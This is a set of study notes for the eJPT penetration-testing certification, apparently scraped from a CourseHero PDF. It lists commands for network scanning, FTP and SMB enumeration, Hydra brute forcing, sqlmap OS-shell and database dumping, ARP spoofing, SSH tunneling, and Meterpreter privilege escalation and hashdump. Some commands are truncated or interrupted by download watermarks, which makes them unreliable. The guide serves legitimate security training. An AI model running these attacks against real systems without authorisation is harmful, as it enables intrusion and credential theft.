eJPT Notes 2022 (eLearnSecurity Junior Penetration Tester)

Collection of notes to prepare for the eLearnSecurity eJPT certification exam.

Before you continue reading, please do the following:

1. Please sign up for a FREE https://ine.com account, and complete the Penetration Testing Student course. It is ABSOLUTE FREE! To be honest, everything you need to pass the eJPT is in that free course.

2. Do NOT treat this exam as a CTF box. This is NOT like a CTF box. Host Discovery is important.

Host Discovery / Enumeration

Let's find out what we are working with. We are completely blind.

Ping Sweep, who can we find on the network?

fping:

fping -a -g {IP RANGE} 2>/dev/null

fping example:

fping -a -g 10.10.10.0/8 2>/dev/null

`````
#### Nmap Ping Sweep:
````bash
nmap -sn 10.10.10.0/8 | grep -oP '(?<=Nmap scan report for )[^ ]*'

Enumerate Hosts Found on Network

Once you have found alive hosts on a network, its time to knock on the doors.

Nmap TCP Quick Scan (step 1)

nmap -sC -sV 10.10.10.10

This study source was downloaded by 100000827263100 from CourseHero.com on 11-04-2023 03:32:28 GMT -05:00

https://www.coursehero.com/file/185574180/eJPT-Notes-2022pdf/
Nmap TCP Full Scan (Step 2)

nmap -sC -sV -p- 10.10.10.10

Nmap UDP Quick Scan

nmap -sU -sV 10.10.10.10

Always save your scans, you never know when you need to pull them up.

nmap -sn 10.10.10.0/24 -oN hosts.nmap

Find Common Vulnerabilities

After you have done all of your scans, and identified open ports on your target, it's time to see if any services are vulnerable.

Common Ports to Look at:

Port Protocol

21 FTP

22 SSH

23 TELNET

25 SMTP

53 DNS

80 HTTP

443 HTTPS

110 POP3

115 SFTP

143 IMAP

135 MSRPC

137 NETBIOS

138 NETBIOS

139 NETBIOS
This study source was downloaded by 100000827263100 from CourseHero.com on 11-04-2023 03:32:28 GMT -05:00

https://www.coursehero.com/file/185574180/eJPT-Notes-2022pdf/
 Port Protocol

445 SMB

3306 MYSQL

1433 MYSQL

3389 RDP

Use Nmap as a Lightweight Vulnerability Scanner

nmap -sV --script=vulners -v 10.10.10.1

if you do not have vulners installed, please install here: https://github.com/vulnersCom/nmap-vulners

nmap --script vuln --script-args=unsafe=1 -iL hosts.nmap

Port 21 - FTP Enumeration

Sometimes clues are put here. :wink: Old versions of FTP maybe vulnerable. Always check the version. Search for the exploit using Google / Searchsploit / Rapid7. If you find some
credential, try it on SSH / Login page / database.

Enumerate FTP Service with Nmap:

nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip

Check for FTP Vulnerabilities with Nmap:

nmap --script=ftp-* -p 21 10.10.10.1

Connect to FTP Service:

ftp 10.10.10.1

ncftp 10.10.10.1

Many ftp-servers allow anonymous users. anonymous:anonymous ️

Bruteforce FTP with a Known Username You Found:

hydra -l $user -P /usr/share/john/password.lst ftp://10.10.10.1:21

hydra -l $user -P /usr/share/wordlistsnmap.lst -f 10.10.10.1 ftp -V

medusa -h 10.10.10.1 -u $user -P passwords.txt -M ftp

Enumerate Users on FTP Service:

ftp-user-enum.pl -U users.txt -t 10.10.10.1

ftp-user-enum.pl -M iu -U users.txt -t $ip

If you do not have ftp-user-enum.pl, you can download it here: https://pentestmonkey.net/tools/ftp-user-enum/ftp-user-enum-1.0.tar.gz

Useful Commands for FTP Service (cmd line):

This study source was downloaded by 100000827263100 from CourseHero.com on 11-04-2023 03:32:28 GMT -05:00

https://www.coursehero.com/file/185574180/eJPT-Notes-2022pdf/
 • send # Send single file
• put # Send one file.
• mput # Send multiple files.
• mget # Get multiple files.
• get # Get file from the remote computer.
• ls # list
• mget * # Download everything
• binary = Switches to binary transfer mode.
• ascii = Switch to ASCII transfer mode

Always Check for FTP Configuration Files:

• ftpusers
• ftp.conf
• proftpd.conf

Vulnerable FTP Versions:

• ProFTPD-1.3.3c Backdoor
• ProFTPD 1.3.5 Mod_Copy Command Execution
• VSFTPD v2.3.4 Backdoor Command Execution

FTP Exploitation Methodology:

1. Gather version numbers

2. Check Searchsploit
3. Check for Default Creds
4. Use Creds previously gathered
5. Download the software

Port 445 - SMB Enumeration

Always check for SMB. You might get lucky and find a vulnerable machine running SMB that has remote code execution. Remember to use searchsploit,
or google to check all service versions for publicly available exploits.

Scan for NETBIOS/SMB Service with Nmap:

nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24

Scan for NETBIOS/SMB Service with nbtscan:

nbtscan -r 192.168.1.0/24

Enumerate the Hostname:

nmblookup -A 10.10.10.1

Check for Null Sessions:

smbmap -H 10.10.10.1

rpcclient -U "" -N 10.10.10.1

smbclient \\\\$ip\\ShareName
`````
##### if getting error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"
````bash
smbclient -L //10.10.10.3/ --option='client min protocol=NT1'

List Shares:
This study source was downloaded by 100000827263100 from CourseHero.com on 11-04-2023 03:32:28 GMT -05:00

https://www.coursehero.com/file/185574180/eJPT-Notes-2022pdf/
 smbmap -H 10.10.1.1

echo exit | smbclient -L \\\\10.10.10.10

nmap --script smb-enum-shares -p 139,445 10.10.10.10

Check for SMB Vulnerabilities with Nmap:

nmap --script smb-vuln* -p 139,445 10.10.10.10

Vulnerable Versions:

• Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default
• Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default
• Most Samba (Unix) servers

List of SMB versions and corresponding Windows versions:

• SMB1 – Windows 2000, XP and Windows 2003.

• SMB2 – Windows Vista SP1 and Windows 2008
• SMB2.1 – Windows 7 and Windows 2008 R2
• SMB3 – Windows 8 and Windows 2012.

Web Application Enumeration / Exploitation - Port 80,443,8080

Make sure that you enumerate, and enumerate some more. :wink:

Web Application Enumeration Checklist:

1. Checkout the entire webpage and what it is displaying.

2. Read every page, look for emails, names, user info, etc.
3. Directory Discovery (time to dir bust!)
4. Enumerate the interface, what is the CMS & Version? Server installation page?
5. Check for potential Local File Inclusion, Remote File Inclusion, SQL Injection, XXE, and Upload vulnerabilities
6. Check for a default server page, identify the server version
7. View Source Code:
a. Check for hidden values
b. Check for comments/developer remarks
c. Check for Extraneous Code
d. Check for passwords
8. Check for robots.txt file
9. study
This Web Scanning
source was downloaded by 100000827263100 from CourseHero.com on 11-04-2023 03:32:28 GMT -05:00

https://www.coursehero.com/file/185574180/eJPT-Notes-2022pdf/
Directory Discovery/Dir Busting:

gobuster dir -u 10.10.10.181 -w /usr/share/seclists/Discovery/Web-Content/common.txt

Gobuster Quick Directory Discovery

gobuster -u $ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

`````
#### Gobuster Directory Busting:
````bash
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Top1000-RobotsDisallowed.txt; gobuster -u http://10.10.10.10

gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o gobuster-root -t 50

Gobuster comprehensive directory busting:

gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.

Gobuster search with file extension:

gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php

wfuzz search with files:

wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200 http://10.10.10.10/FUZZ

Erodir by PinkP4nther

./erodir -u http://10.10.10.10 -e /usr/share/wordlists/dirb/common.txt -t 20

dirsearch.py

cd /root/dirsearch; python3 dirsearch.py -u http://10.10.10.10/ -e .php

If you are really stuck, run this:

for file in $(ls /usr/share/seclists/Discovery/Web-Content); do gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/$file -e -k -l -s "

Check different extensions:

sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar

SQL Injection Testing (automated!)

if you follow the above check list, you should have a list of parameters to test for SQL injection. Automate it with SQLMAP!

SQLmap Commands:

sqlmap -u http://10.10.10.10 -p parameter

sqlmap -u http://10.10.10.10 --data POSTstring -p parameter
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump

Password Cracking
I highly suggest you learn how to use John The Ripper, Hydra, and how to unshadow passwd files. :wink:
This study source was downloaded by 100000827263100 from CourseHero.com on 11-04-2023 03:32:28 GMT -05:00

https://www.coursehero.com/file/185574180/eJPT-Notes-2022pdf/
Unshadow

This will prepare the file for John The Ripper, you need a Passwd & Shadow File.

unshadow passwd shadow > unshadow

Hash Cracking - John The Ripper

john -wordlist /path/to/wordlist -users=users.txt hashfile

Networking - Routing
I highly recommend that you get comfortable with general networking and routing concepts, including be able to read and understand .PCAP files.

Set up IP Routing and Routing Tables

ip route - prints the routing table for the host you are on
ip route add ROUTETO via ROUTEFROM - add a route to a new network if on a switched network and you need to pivot

ARP Spoofing

echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11

This study source was downloaded by 100000827263100 from CourseHero.com on 11-04-2023 03:32:28 GMT -05:00

https://www.coursehero.com/file/185574180/eJPT-Notes-2022pdf/
SSH Tunneling / Port Forwarding

# local port forwarding

# the target host 192.168.0.100 is running a service on port 8888
# and you want that service available on the localhost port 7777

ssh -L 7777:localhost:8888 user@192.168.0.100

# remote port forwarding

# you are running a service on localhost port 9999
# and you want that service available on the target host 192.168.0.100 port 12340

ssh -R 12340:localhost:9999 user@192.168.0.100

# Local proxy through remote host

# You want to route network traffic through a remote host target.host
# so you create a local socks proxy on port 12001 and configure the SOCKS5 settings to localhost:12001

ssh -C2qTnN -D 12001 user@target.host

Network/Service Attacks

You may need to bruteforce a service running, such as SSH, FTP, etc. Just replace the service name below to bruteforce.

hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22

hydra -L users.txt -P pass.txt telnet://10.10.10.10

Using Metasploit
I highly recommend getting comfortable with metasploit, and meterpreter just incase you find Remote Code Execution, and spawn a shell.

Basic Metasploit Commands

search x
use x
info
show options, show advanced options
SET X (e.g. set RHOST 10.10.10.10, set payload x)

Useful Meterpreter Commands (reverse shell)

This study source was downloaded by 100000827263100 from CourseHero.com on 11-04-2023 03:32:28 GMT -05:00

https://www.coursehero.com/file/185574180/eJPT-Notes-2022pdf/
 background
sessions -l
sessions -i 1
sysinfo, ifconfig, route, getuid
getsystem (privesc)
bypassuac
download x /root/
upload x C:\\Windows
shell
use post/windows/gather/hashdump

This study source was downloaded by 100000827263100 from CourseHero.com on 11-04-2023 03:32:28 GMT -05:00

https://www.coursehero.com/file/185574180/eJPT-Notes-2022pdf/
Powered by TCPDF (www.tcpdf.org)